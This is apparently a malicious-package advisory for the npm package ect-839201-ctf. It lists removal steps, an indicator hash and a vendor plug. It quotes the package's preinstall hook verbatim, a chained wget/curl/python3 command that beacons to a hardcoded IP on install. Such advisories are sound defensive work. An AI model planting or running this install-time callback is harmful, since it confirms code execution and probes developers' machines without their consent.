Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

ect-839201-ctfnpm

Malicious code in ect-839201-ctf (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5721
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall ect-839201-ctf

What this malware does

On npm install, package.json's preinstall script executes wget http://10.107.121.85:8000/callback_wget || curl http://10.107.121.85:8000/callback_curl || python3 -c "import urllib.request; urllib.request.urlopen('http://10.107.121.85:8000/callback_py')". This unconditionally beacons to a hardcoded RFC1918 IP over plain HTTP with three different callback paths corresponding to the tool that succeeded — a recon primitive that confirms arbitrary code execution on the installer's machine and enumerates which outbound utilities are available. The package's own description is "Probe", and it ships no functional code. There is no legitimate package-functional purpose for the beacon; the install-time outbound request is the package's entire behavior.

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

bda37f74ff0d1b56cb7805906d4fd32a7e2ccc15aa96768d9f9e510202712dcb

Frequently asked questions

No. ect-839201-ctf on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006245

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection